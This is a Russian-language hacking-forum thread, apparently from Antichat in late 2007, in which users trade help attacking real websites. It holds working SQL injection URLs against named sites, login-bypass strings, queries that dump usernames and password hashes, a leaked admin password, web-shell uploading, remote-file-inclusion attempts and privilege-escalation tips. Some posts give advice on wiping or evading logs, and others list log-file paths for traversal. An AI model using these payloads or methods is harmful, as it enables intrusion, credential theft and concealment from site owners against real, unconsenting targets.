Просмотр полной версии : Ваши вопросы по уязвимостям.
У меня целая куча вопросов:
как обходить фильтрацию пробелов в скуле? /**/ не катит.
Как зашифровывать символы, чтобы получилось что-то такое: 0x27 ?
Чем можно примконнектиться к БД, если знаешь логин и пароль (программка клиент есть? откуда скачать?). База Данных - МуСкул.
Всем спасибо кто поможет+++
1. Варианты пробела:
+, %2B, %09, %0D, %0A
2. Mysql Hex, обычное представление информации в шестандцетеричной системе счисления, только добавление к началу 0x. Как вариант, кодировать можно тут:
http://quest.antichat.net/code.php
3. Navicat, погугли и найдёшь.
presidentua
18.12.2007, 17:49
У меня целая куча вопросов:
Как зашифровывать символы, чтобы получилось что-то такое: 0x27 ?
Чем можно примконнектиться к БД, если знаешь логин и пароль (программка клиент есть? откуда скачать?). База Данных - МуСкул.
Начнем с последнего: для конекта можеш использовать MySql-Front, но огорчю тебя наверно 99% случаях запрещают доступ из вне :(, но попробуй может тебе повезет :).
Для помощи в инекции использую прогу от Smersh, маленькая простая и удобная. Попробуй может понравиться. http://slil.ru/25252210 :)
-------------------------
ПС: Сори! .Slip обогнал. плюс ему за скорость :)
Нужна помощь в заливке шелла.
Есть доступ к кривой админке. и скуль. Мне просто интересно в образховательных целях что можно сделать дальше, если у кого получится, то выложите здесь подробное описание...
ЗЫ
http://www.kaprikorn-shop.co.uk/index1.php?cat=1&prod=3+union+selecе+1,2,3,4,5,6+from+information_ schema.tables/*
пасс к админке 01041972
Может, кто-то ещё попробует?
Termin@L
18.12.2007, 19:40
можно разделять тремя способами - пробелами, +, и /**/ больше вроде никак
это 16-теричное представление чмсла, 0х впереди это как раз обозначегие, что дальще всё в хекс
коннектиться можно, с помощью разных прог, есть ачатовская, есть mysql client, с помощью пхп скрипта самописного, но всё это лишь в том случае, если разрешено подключаться удалённо
можно разделять тремя способами - пробелами, +, и /**/ больше вроде никак
А блядь это я с потолка взял, да?
1. Варианты пробела:
+, %2B, %09, %0D, %0A
=\
%09 - табуляция
%0d - возврат коретки
%0А - перевод строки
Вопрос такой: я взломал сайт через инъекцию, могут ли админы узнать как я это сделал? Посмотрят в логи и узнают? А если логи стереть?
И еще один вопрос можно ли произвести инъекцию так чтоб админы не узнали(вернее чтоб в логах ничего небыло)?
Вопрос такой: я взломал сайт через инъекцию, могут ли админы узнать как я это сделал? Посмотрят в логи и узнают? А если логи стереть?
И еще один вопрос можно ли произвести инъекцию так чтоб админы не узнали(вернее чтоб в логах ничего небыло)?
Могут, все гет запросы логируются. Ёпт, если сотрёшь то не узнают:d Можно и без палева произвести, Постом. Но не всегда это удаётся.
.Slip, а пост точно не логируются?
blackybr
18.12.2007, 23:42
пост запросы логируются если стоит апач с модулем mod_security
Red_Red1
18.12.2007, 23:43
Прошу помощи в такой штуке....
http://vip.km.ru/megabook/animal/Encyclop.asp?Topic=Stat_anim_772'+or+1=(SELECT+TOP +1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
Конкретно с этим запросом вроде все ясно, но как только иду дальше нифига не выходит. Как инструкцию использую статью Кеша (которая ни разу не подводила) по иньекции в МССКЛ.... Есть подозрение что можно составить запрос правильно и вывести таки все таблицы и столбики и т.д.... но вот КАК.... (а может и ни как).
Расскажите, объясните, мсскл не столь популярна... сам так и не догадался и не нашел инфу?
.Slip, а пост точно не логируются?
Логируются, например таким способом:
httpd.conf
<IfModule mod_security.c>
SecAuditEngine On
SecFilterScanPOST On
SecFilterEngine On
</IfModule>
Включает регистрацию пост запросов. Но про такие вещи большинство забывает. Да и при просмотре логов, пост не так бросается в глаза как гет.
blackybr
19.12.2007, 00:46
Red_Red1 ограничение на ввод параметра как я посчитал 84 символа :D
MaksimIsaev
19.12.2007, 02:07
_http://www.svt.vologda.ru/template.asp?file=что угодно, хоть майл ру
Разнообразные ../htpaswd не катят, похоже, что это запрос к базе, а не тупая подстановка имени.
Как бы поточнее определиться с дальнейшими действиями?
Ничего тут не сделаешь, данные из параметра file вставляются в фрейм
MaksimIsaev
19.12.2007, 02:34
Да, но в идеале в этом фрейме может же оказаться содержимое нужных/интересных/ файлов?
Может, но тебе будет показываться только сам html
даже если ты смотришь файл config.asp, или еще какой, который просто хранит данные, а ничего не выводит, толку 0.
Конечно можно попробовать поискать какие-либо данные, но наврятли ты их найдешь (и есть ли они)
как осуществлять скуль если страница кончаеться на ".html" ?
тут наверняка .htaccess помогают но как это обойти ???
сам не знаю - вот у вас решил спросить
также бывает что страница http://www.site.ru/lll/1123.htm выдаёт ошибки sql ...
как осуществлять скуль если страница кончаеться на ".html" ?
тут наверняка .htaccess помогают но как это обойти ???
сам не знаю - вот у вас решил спросить
также бывает что страница http://www.site.ru/lll/1123.htm выдаёт ошибки sql ...
как я понял там юзаеться mod_rewrite
blackybr
19.12.2007, 14:33
единственный способ - гугл, если он проиндексировал раньше чем поставили "переписанные ссылки", либо тупо угадать :)
Да, но в идеале в этом фрейме может же оказаться содержимое нужных/интересных/ файлов?
С таким же успехом ты можешь просто обратится к ним, например site.ru/.htaccess, вместо site.ru/script.asp?file=.htaccess
Знаешь какой результат будет? =) Вот и у ифрейма тоже самое
159932, там mod_rewrite или в штацессе прописано что то типа
add-type application/x-httpd-php .html
единственный способ - гугл, если он проиндексировал раньше чем поставили "переписанные ссылки", либо тупо угадать :)
поможет если только сайт не поливался сразу с переписаными ссылкамми :)
У меня такой вопрос.
http://www.halbot.ru
Странная форма авторизации.
Я могу авторизоваться по типу: ' or 1=1/* : 1 Сразу появляется левая анкета, я ее не регистрировал.
Так, вот попробовал авторизоваться под админом:
"admin" : 'or 1=1/*
admin'/* : 1
admin'/* : or 1=1/*
Ковырял минут пять но эффекта не добился. В чем я могу ошибаться?
попробуй так
1' or login like %admin% /*
Т.е. заходить будет в том случает если логин содержит последовательность символов admin (admin123 SITEadmin RadminR)
За место login может быть что-нибудь другое. Например пароль или мыло или аська....
В логине может быть максимум 12 знаков
Пробовал 1' or admin' : 1 не получилось.
Ни кавычки ничего он не съедает, а лишь тупо их пропускает.
Я еще подумал, что это ловушка админа ..а нет. пропускает на любой пароль но ' or 1=1/* должен быть обязателен.
Эээ..разобрался! :D
Собственно так. Аккаунта admin там нет.
Но порывшись в комментах и выдернув первый попавшиеся логин я спокойно авторизовался по нему. :rolleyes:
на ловушку легко можно проверить подставиви например ' or 999=999/*
Я еще подумал, что это ловушка админа ..а нет. пропускает на любой пароль но ' or 1=1/* должен быть обязателен.
Эээ..разобрался! :D
Собственно так. Аккаунта admin там нет.
Но порывшись в комментах и выдернув первый попавшиеся логин я спокойно авторизовался по нему. :rolleyes:
Ну вот, пользуйся на здоровье :) А админа все же найди!
Гхм. Нашел.
Админ - halbot
Авторизовался как halbot : 'or 1=1/*
А как ' or 999=999/* Не получилось.
Самое интересное, что когда авторизуюсь под левым ником никакая информация не выскакивает. Один емейл тип zz@zz и все.
Акк админа то есть, но входа в админку там нет.
http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* подобрал пароль и юзера....а вот админку найти не могу....помагите найти плизз))
Не могу раскрутить =\ :
Database error with query: [SELECT s1.id as parent_id, s1.title as parent_title FROM sections as s LEFT JOIN sections as s1 on s.parent_id=s1.id WHERE s.id=]: error 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/sinaius2/public_html/evreimir/article.php on line 41
(http://www.evreimir.com/article.php?id=-12032&res=1)
Кроме этого:
http://www.rudtp.ru/articles.php?id=44+ORDER+BY+7/*
Все норм, а так:
http://www.rudtp.ru/articles.php?id=44+UNION+SELECT+1,2,3,4,5,6,7/*
Ошибка. Почему? :confused:
BlackCats
21.12.2007, 15:28
http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* подобрал пароль и юзера....а вот админку найти не могу....помагите найти плизз))
http://www.tymoshchuk.com/priv/index.php
в админке ни чего интересного..
PS
задефейсиш - запинаю.
http://www.evreimir.com/article.php?id=-12032&res=1
у меня вобще не загружается
Кроме этого:
http://www.rudtp.ru/articles.php?id=44+ORDER+BY+7/*
Все норм, а так:
http://www.rudtp.ru/articles.php?id=44+UNION+SELECT+1,2,3,4,5,6,7/*
Ошибка. Почему? :confused:
http://www.rudtp.ru/articles.php?id=44+and+substring(version(),1,1)=3
в третьей ветке не предусмотрено использование конструкции union select
Подскажите, пожалуйста, пути к логам апача. Где сохраняются параметры refferer, user-agent и др... Чем больше вариантов тем лучше.
Подскажите, пожалуйста, пути к логам апача. Где сохраняются параметры refferer, user-agent и др... Чем больше вариантов тем лучше.
../logs/error.log
../logs/access.log
../../logs/error.log
../../logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
Вот возможные пути.
Искал на сайте уязвимость и вот что мне выдало:
Query: 'SELECT id,id2 FROM forum,player WHERE id=1_id AND id_1=9 ORDER BY is_announce DESC, last_reply_time DESC LIMIT -2570, 10' failed...
Что-то не та ошыбка которая должна быть. Здесь есть уязвимость или нет??? Если да то почему я немогу подобрать таблицу.
Искал на сайте уязвимость и вот что мне выдало:
Query: 'SELECT id,id2 FROM forum,player WHERE id=1_id AND id_1=9 ORDER BY is_announce DESC, last_reply_time DESC LIMIT -2570, 10' failed...
Что-то не та ошыбка которая должна быть. Здесь есть уязвимость или нет??? Если да то почему я немогу подобрать таблицу.
Ну если я правильно понял то "-2570"- какой то третий параметр который ты можешь изменять...
Уязвимость есть, но что либо сделать путного ты не сможешь к сожлению так как перед этим стоит order by...
Ну если я правильно понял то "-2570"- какой то третий параметр который ты можешь изменять...
Уязвимость есть, но что либо сделать путного ты не сможешь к сожлению так как перед этим стоит group by...
А как можно обойти??
никак, почитай форум про инъекцию после limit
ЗЫ А теперь нашел такую ошибку: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in .../free.php on line 78
Таблица не подбирается. Здесь тоже какой-то прикол???
сейчас я уйду в транс, и пойму что за ссылка, где баг и что ты подставляешь, и поговорив с духами узнаю как правильно составить запрос...
хз, я пробовал, не получилось =\
такой вопрос нашел SQL инъекцию но тут проблема хэш не полностью виден,
ссылка обрезает, походу не хватает 3х символов
ac34136776f3f1f60c6b4c642...
подаю вот такой запрос
/index.php?kat=-8+union+select+concat(pass)+from+user/*
подскажите каким запросом выдернуть полный хэш
спс за рание
substring(str,begin,length) - возвращает подстроку str, начиная с begin символа по счету длиной численно равной length.
в твоём случае надо два запроса делать, например сначала первые 16 символов, потом отсавшиеся 16 символов
ЗЫ concat в твоём запросе не нужен, он служит для "склеивания" строк, а у тебя тут нечего "склеивать"
А что если так :)
/index.php?kat=-8+union+select+concat(substring(pass,1,16),substri ng(pass,16,16))+from+user/*
Доброго времени суток, ув. Античатовцы.
Возникло несколько вопросов по sql-inj, следующего содержания:
1). Версия- 5.0.33-log, с помощью table_name и information_schema.tables подобрал необходимое количество таблиц (237 штук!!) и все имена посписывал, с помощью сolumn_name и information_schema.columns подобрал необходимое количество колонок, но их оказалось 1254 единицы!!!! После таблиц, ни сил, ни желания их выводить по одному нет :) -можно ли составить запрос, для вывода всех имен колонок сразу, или есть какой-нить софт, соответствующий теме вопроса? Пните хотя б на статью по теме...
2). В именах таблиц, которые я вывел, нет таблицы mysql.user, но тем не менее она присутствует, из неё я вывел имя пользователя REPLOTAGE и пассворд вида: *977C2D1B79842769D627EBFAC5AA07D04F40EBC0
Именно так, со звёздочкой в начале. :)
Подскажите, это MD5 хеш или что другое, и как его расшифровать, т.к. в скулях я новичёк и заинтересовался ими менее недели назад. Все найденные он-лайн тулзы по расшифровке не дали никакого результата, либо писали, что не правильный формат функции. Соответственно данный аспект мне крайне интересен ...
3). Среди тех имён таблиц, что я вывел, при запросе к ним с помощью +from+, они все выдают ошибку Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in тратата on line 531. Хотя там есть и accounts и user и users и administrations, в общем все необходимые и полезные таблицы. Пробовал в верхнем и нижнем регистре, результат тот же. Ошибка та же, стандартная. Побуквенно переключать регистр не пробовал, и так запарился с таблицами и колонками :) .Но имена то вывел, и acess denied не пишет...В чём же дело? К mysql.user, к примеру, подходит нормально, выводит из неё, и с +from+ ошибку не выдаёт...
Чё то хотел ещё спросить, но забыл. :) В общем, заранее благодарен за Ваш совет.
С ув. ThreeD
Для ThreeD
1) и 3) : нет конкретной ссылки - нет конкретного ответа!
2) Это SHA-1 - алгоритм (PasswordsPro юзай!) и пусть * тебя не смущает!
ThreeD, fRg, этот хэш - MySQL5. Давно MySQL шифрует свои пассы в SHA-1?
ThreeD, fRg, этот хэш - MySQL5.
Благодарен за ответ, но вопрос остался актуален, где или чем расшифровать данный хеш?
С ув. ThreeD
Благодарен за ответ, но вопрос остался актуален, где или чем расшифровать данный хеш?
С ув. ThreeD
юзай passwordpro ;)
Благодарен за ответ, но вопрос остался актуален, где или чем расшифровать данный хеш?
С ув. ThreeD
Что на вопросы по sql-inj, что на этот можно найти ответы просмотрев несколько тем на форуме. ты кроме этой темы другие не видешь?
Доброго времени суток, ув. Античатовцы.
Возникло несколько вопросов по sql-inj, следующего содержания:
1). Версия- 5.0.33-log, с помощью table_name и information_schema.tables подобрал необходимое количество таблиц (237 штук!!) и все имена посписывал, с помощью сolumn_name и information_schema.columns подобрал необходимое количество колонок, но их оказалось 1254 единицы!!!! После таблиц, ни сил, ни желания их выводить по одному нет :) -можно ли составить запрос, для вывода всех имен колонок сразу, или есть какой-нить софт, соответствующий теме вопроса? Пните хотя б на статью по теме...
2). В именах таблиц, которые я вывел, нет таблицы mysql.user, но тем не менее она присутствует, из неё я вывел имя пользователя REPLOTAGE и пассворд вида: *977C2D1B79842769D627EBFAC5AA07D04F40EBC0
Именно так, со звёздочкой в начале. :)
Подскажите, это MD5 хеш или что другое, и как его расшифровать, т.к. в скулях я новичёк и заинтересовался ими менее недели назад. Все найденные он-лайн тулзы по расшифровке не дали никакого результата, либо писали, что не правильный формат функции. Соответственно данный аспект мне крайне интересен ...
3). Среди тех имён таблиц, что я вывел, при запросе к ним с помощью +from+, они все выдают ошибку . Хотя там есть и accounts и user и users и administrations, в общем все необходимые и полезные таблицы. Пробовал в верхнем и нижнем регистре, результат тот же. Ошибка та же, стандартная. Побуквенно переключать регистр не пробовал, и так запарился с таблицами и колонками :) .Но имена то вывел, и acess denied не пишет...В чём же дело? К mysql.user, к примеру, подходит нормально, выводит из неё, и с +from+ ошибку не выдаёт...
Чё то хотел ещё спросить, но забыл. :) В общем, заранее благодарен за Ваш совет.
С ув. ThreeD
вообщем так по пунктам...
1) Лезь в статьи-SQL inj полный фак- в конце найдешь скрипт на пхп для дампа по одному полю... зовецо вроде как для вывода через limit... там не сложно
2)это я написал выше...
3)Когда же вы научитесь смотреть имя БД в которой находицо таблица?... Создай запрос типа SELECT TABLE_SCHEMA FROM INFORMATON_SCHEMA.TABLES WHERE TABLE_NAME='accounts'
и следующий запрос будет типаSELECT [имя столбца из этой таблицы] FROM [то что ты получишь из первого запроса].accounts
Уже определился, всем благодарен за ответы.
2 I-I()/Ib
Отдельное спасибо, не без Вашей помощи ;) Вам +. Ещё раз благодарю.
2 Nea7
Для того, чтобы что-то найти, надо знать что ищеш. До некоторых нюансов, в коих меня, благо, просвятили-что искать, а уж тем более где, я и понятия не имел.Нашёл тему с подходящей тематикой и названием, и раз уж начал здесь задавать вопросы-то старался придерживаться темы, дабы не метаться по всему форуму.Надеюсь, моя позиция ясна? :)
С ув. ThreeD
2 Nea7
Для того, чтобы что-то найти, надо знать что ищеш. До некоторых нюансов, в коих меня, благо, просвятили-что искать, а уж тем более где, я и понятия не имел.Нашёл тему с подходящей тематикой и названием, и раз уж начал здесь задавать вопросы-то старался придерживаться темы, дабы не метаться по всему форуму.Надеюсь, моя позиция ясна? :)
С ув. ThreeD
если для тебя просмотреть пару тем - это метаться по форуму, то уж извини =\ дабы облегчить твои метания вот держи брошюрку (http://slil.ru/25289116)
Calcutta
27.12.2007, 00:55
Сайт селан на вордпрессе, дабы облегчить себе поиски просканил его xSpider'ом, нашел скуль инъекциюв виде http://site.ru/?p=1' . выдает результат как с ковычкой, так и без нее:
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY post_date ASC LIMIT 1' at line 1]
SELECT ID, post_title FROM wp_posts WHERE post_date > '' AND post_type = 'post' AND post_status = 'publish' AND ID != ORDER BY post_date ASC LIMIT 1
пробнул всеми стандартными методами - ничего не вышло.. если у кого был опыт лома вордпресса в пм plz, плюсиком не обижу ;)
з.ы. мож есть у кого сплоит под Quagga ? :)
Подскажите плиз где можно скачать шелл ? а то в поиске не могу найти, не знаю может не так набираю.
Какой именно шелл тебе нужен, а то их много?)
DВот например шелл от команды рст скачать (http://dump.ru/files/n/n762315/)
У меня такой вопрос: я залил на сайт шелл(C99madShell v. 2.0 madnet edition), могу только скачиват файлы. Закачивать могу только в одну папку "images". В другие папки не закачивает. Не могу изменить chmod. Насколько я понимаю у меня нет прав ы на запись или есть еще какая-то проблема??? Если у меня нет прав на запись, то как можно их получить???
Ищи сплоенты под товою ось для локального поднятия прав как вариант ;)
точно не скажу, но помоему в маднетовском шелле бага такая, что файлы он заливает в туже папку где и шелл, а права для записи скорее всего есть у фтп-пользователя ищи конфиги для работы с БД, находи в них пароли от БД и пробуй эти пароли на фтп или ssh
В форуме ipb версии 1.3 finall залил через "Загрузка нового стиля" шелл.
Теперь не могу его найти. Система говорит, что он есть, а по адресу sait.ru/Skin/shell.php его нет.
Куда могла его импотировать система?
Такой вопрос
index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*
Таким запросом я могу просматривать хэши, меняя только значения limit,
а каким запросом можно перемаслать Юзверей?
Такой вопрос
index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*
Таким запросом я могу просматривать хэши, меняя только значения limit,
а каким запросом можно перемаслать Юзверей?
Ты имеешь ввиду логины ?
ну например так
index.php?kat=2&kp=-39+union+select+concat_ws(0x2F,login,pass)+from+us er+limit+0,1/*
вывод будет логин/хеш
или так
index.php?kat=2&kp=-39+union+select+concat(login,0x2F,pass)+from+user+ limit+0,1/*
вывод будет такой же
вот все пишут, когда получил файл etc/passwd пробрути по логин:логин
А что пробрутить-то надо и чем?
Ещё вопрос, очень гглупый. для чего в БД используется limit и как он помогает в иньекциях?
У меня какая-то херня получается с 1 сайтом:
http://www.verticalworld.net/school/program.php?id=6'
Если сделать так:
http://www.verticalworld.net/school/program.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37/*
Не получается, а если так:
http://www.verticalworld.net/school/program.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38/*
Получается еще неправильней. Что делать? :confused:
Calcutta
29.12.2007, 22:35
вот все пишут, когда получил файл etc/passwd пробрути по логин:логин
А что пробрутить-то надо и чем?
Ещё вопрос, очень гглупый. для чего в БД используется limit и как он помогает в иньекциях?
Бруть с помощью Hydra фтп, е-маилы и т.д. вижео по использованию выложено здесь, поюзай поиск.
2~EviL~
есть 2 запроса, в которых используется id (на самом деле их 3 как минимум там еще UPDATE есть)
1.SELECT * FROM school_programs WHERE id =$id он получает все колонки из таблицы school_programs, их 37 и когда ты подставляешь union select с 37 колонками запрос получается правильный:
SELECT * FROM school_programs WHERE id =1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7/*
но потом $id (и твой запрос соответственно) передается во второй запрос:
2.SELECT AVG(score) AS number FROM school_rating WHERE program_id =$id он получает одно число (среднее из колонки score) подставляем значение $id получаем
SELECT AVG(score) AS number FROM school_rating WHERE program_id = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7/*
неправильный запрос, для правильного запроса надо было бы указать:
$id=1 union select 1/* но это вызвало бы ошибку в первом запросе, так что тут остается только использовать подзапросы по другому никак
Спасибо, Scipio, я даже не подозревал что все так сложно... Ну, тогда есть вопрос и по MSSQL:
http://www.thetruthseeker.co.uk/article.asp?ID=1+OR+1=@@version--
Я так понял, что не хватает какого-то оператора. Можете подсказать в чем суть ошибки, и, конечно, показать как правильно составить запрос =)
Это инъекция в MS Access в нем очень сложно провести инъекцию, в твоем случае только если подзапросы помогут (т.е. посимвольный перебор)
Ладно, сегодня явно не мой день :D Остается надеяться на завтрашний ))
HedgeH0g.trj
30.12.2007, 15:12
Вот нашел что-то
*******.ru/index.php?page=viewcom&newscode='
Warning: fopen() [function.fopen]: Unable to access news/\'.mnf in /www/inquizit/www/htdocs/include/showcom.inc on line 2 Warning: fopen(news/\'.mnf) [function.fopen]: failed to open stream: No such file or directory in /www/inquizit/www/htdocs/include/showcom.inc on line 2 Warning: fgets(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 2 Warning: fpassthru(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 5 Warning: filemtime() [function.filemtime]: stat failed for news/\'.mnf in /www/inquizit/www/htdocs/include/showcom.inc on line 5 01.01.70 03:00 Warning: fclose(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 6
Это php-include? может что-то другое или вообще уязвимости нет..?
blackybr
30.12.2007, 15:14
скорее всего magic_q on поэтому инклуд не пройдет. хотя существует маленькая вероятность addslashes или подобного. попробуй добавить %00
HedgeH0g.trj
30.12.2007, 15:24
просто после кавычки?
просто после кавычки?
нет...
?page=viewcom&newscode=http://shell/shell%00
?page=viewcom&newscode=http://shell/shell.php%00
HedgeH0g.trj
30.12.2007, 15:26
скиньте ссылку на шелл плз
короче может на живом примере что-то увидите))
_http://inquizition.ru/index.php?page=viewcom&newscode='
нет...
?page=viewcom&newscode=http://shell/shell%00
?page=viewcom&newscode=http://shell/shell.php%00
Это точно не прокатит, потому что во-первых это читалка а не инклюд (возможно там даже вывода файла нет)
а вовторых перед параметром в fopen добавляется 'news/'
если б была возможность удаленно инклюдить файлы, то и %00 добавлять не надо было бы
HedgeH0g.trj
30.12.2007, 15:48
Так что, здесь нифига не выйдет?
посмотрел, там magic_quotes on скорее всего, safe mode (но это фигня), вобщем ничего не выйдет т.к. %00 экранируется
HedgeH0g.trj
30.12.2007, 16:12
посмотрел, там magic_quotes on скорее всего, safe mode (но это фигня), вобщем ничего не выйдет т.к. %00 экранируется
жопа, блин...сори
tar cvfz file.tgz /path/
Обьясните как этой командой пользоватся.
Что такое cvfz, /path/
Можно ли какой-то командой заархивировать папку с вложеными файлами?
Или может есть какой-то шелл который выкачивает целые папки???
Тут все просто tar - программа для архивирования файлов
опция c - говорит что нужно создать архив
опция v - говорит что нужно показать процесс создания
опция f - задает имя файла (file.tgz в твоем случае)
опция z - говорит что нужно сначала сжать файлы, а потом заархивировать (без нее сжатия не будет, а будет просто архивирование)
/path/- это путь до папки которую хочешь заархивировать
Неудаётся произвести иньекцию... Помогите ребята.
вот ссылка
_http://www.bhv.ru/books/boa.php?id=-1))+and+((1=1
а вот админка
http://www.bhv.ru/admin/
Неудаётся произвести иньекцию... Помогите ребята.
вот ссылка
_http://www.bhv.ru/books/boa.php?id=-1))+and+((1=1
а вот админка
http://www.bhv.ru/admin/
это хорошее издательство... не надо...
это хорошее издательство... не надо...
да я же и не спорю, сам их книги покупаю и на одной из них наткнулся на сайт. Эт так... Спортивный интерес. Потом конечно админам сообщу о баге, а пока интересно проинжектить
Имхо не выйдет у тебя ничего, в ibase очень мало встроенных функций, я мало знаком с interbase но помоему там подобия substring нет (покрайней мере substring надо объявлять DECLARE), т.е. посимвольного перебора неполучится, еслиб была возможность посимвольного перебора можно бы было сделать примерно так:
http://www.bhv.ru/books/boa.php?id=176924+and+SUBSTRING((SELECT+RDB$OWNER_ NAME+FROM+RDB$ROLES)+1+FOR+1)='U'
а пока можно довольствоваться только этим:
http://www.bhv.ru/books/boa.php?id=176924+and+1=1
я могу и ошибаться, так как с IB знаком мало
омфг, наткнулся я как то на интербейз, почитал маны.... мой тебе совет забить накуй, ибо там каждый столбец имеет определённый тип данных, и хер ты переведёшь их =\ Хотя там так же юнион селект работает, ну у меня работал =\ Но вот с типами напряг, там даже null не прокатит
blackybr
01.01.2008, 18:17
ибо там каждый столбец имеет определённый тип данных
О_о
во всех рсубд каждый столбец имеет определенный тип данных))) в том же мускуле их от 25 до 30 (точно не помню). Просто мускул он более демократичный из-за непривиредливости к выводу данных другого типа
Taylorith
03.01.2008, 05:53
Дарова люди , есть вопрос седня покапался в одном сайте и нашел вот что
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Íåäîïóñòèìîå èìÿ ñòîëáöà "undefined".
/services-list.asp, line 34
Íåäîïóñòèìîå èìÿ ñòîëáöà - вот это что
вот каким образом я получил то что выше находится
https://site.ru/services-list.asp?id=9'
вприцнипе думаю все понятно )))
проблема в том что дальше как мне действовать?? можно ли поиметь из этого что нить выгодное для меня )) спасибо!
delay(0)
03.01.2008, 09:26
как мне действовать??
http://forum.antichat.ru/thread30501.html
Taylorith
03.01.2008, 09:31
спасибо то есть тут вполне возможно осуществить атакУ?
Taylorith
03.01.2008, 09:44
еще нашел кое что
Невозможно выполнить запрос к базе данных.
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /opt/site/trunk/htdocs/tv_channels.php on line 85
Описание канала не найдено.
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /opt/site/trunk/htdocs/tv_channels.php on line 89
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /opt/site/trunk/htdocs/tv_channels.php on line 102
Taylorith
03.01.2008, 09:48
ничего )) помоему это мне ниче не дает
Taylorith, http://forum.antichat.ru/thread19605.html
Taylorith
03.01.2008, 09:51
я это уже десять раз читал , забей уже я сам понял что на том сайте хоть и есть ошибки в запросах , но поиметь от них ни фига нельзя((((( оч жаль((
Taylorith, скинь сайт в пм
Taylorith
03.01.2008, 10:00
скниул если че)
Есть стата для кс "PsychoStats v3.0.6b". Есть сплойт
http://www.example.com/[path]/server.php?newcss=styles.css&newtheme=%00
Запаганить статистику получается :) А вот как из этого извлеч хоть какую-нибудь пользу?
blackybr
03.01.2008, 18:47
я посмотрел чтоэто за "сплоит", на багртаках написано - information disclosure)) как ты "запоганил статистику" ?
Да подставляю "server.php?newcss=styles.css&newtheme=%00" и все ппц =) Одни ошибки при заходе на стату %)
psychostats
2007-10-26
Version: 3.0.7b
Small security update (All users should use this over the previous version 3.0.6).
в этой версии уязвимости уже нет?
AFoST http://securityvulns.ru/Rdocument77.html
Не хочу оффтоп разводить, но в психостате так много уязвимостей, что тема не стоит обсуждения, просто те кто сможет этими уязвимостями воспользоваться те и и баге смогут найти, а те кто уязвимостями в психостате воспользоваться не смогут, тому они как бы и ненужны, я там видел кучу скулей после ордер бай, но для этого надо уметь пользовать скуль инъекции
Piflit, по ссылке только про xss написано...
Кстати если подставить в "server.php?newcss=styles.css&newtheme=%00" перед %00 любой символ и перейти по адресу, то ошибки не вылетают =\
Не хочу оффтоп разводить, но в психостате так много уязвимостей, что тема не стоит обсуждения, просто те кто сможет этими уязвимостями воспользоваться те и и баге смогут найти, а те кто уязвимостями в психостате воспользоваться не смогут, тому они как бы и ненужны, я там видел кучу скулей после ордер бай, но для этого надо уметь пользовать скуль инъекции
можно поподробнее. у меня на сайте эта стата стоит. или в личку...
Покапался нашел скул после order by
player.php?id=11&ssort=(-skill*(-1))&sorder=desc
player.php?id=11&ssort=(-skill)&sorder=desc
Выводятся скиллы упарядоченные от большего к меньшему и наоборот.
Да, там точно скул есть.
ssort=(-skill*(1=1))--
обрезание запроса
Счас покапался, типа это наверное скул после ордер бай
player.php?id=11&ssort=(-skill*(-1))&sorder=desc
player.php?id=11&ssort=(-skill)&sorder=desc
Выводятся скиллы упарядоченные от большего к меньшему и наоборот...
Если поддерживаются подзапросы, пробуй сделать слепую иньекцию.
угу, плюсенг, но их там полно
sedoy_xxx
04.01.2008, 15:06
Всем привет. Вопрос такой: есть возможность заливать картинки на сайт, но расширение и содержимое файла фильтруется, так вот помню читал где-то что при редактировании изображения можно дописать php код в какие-то теги. Не напомните что за способ? Или поделитесь другими методами обхода такой фильтрации
Про расширения тут глянь:
https://forum.antichat.ru/threadnav23501-1-10.html
дописать php код в какие-то теги
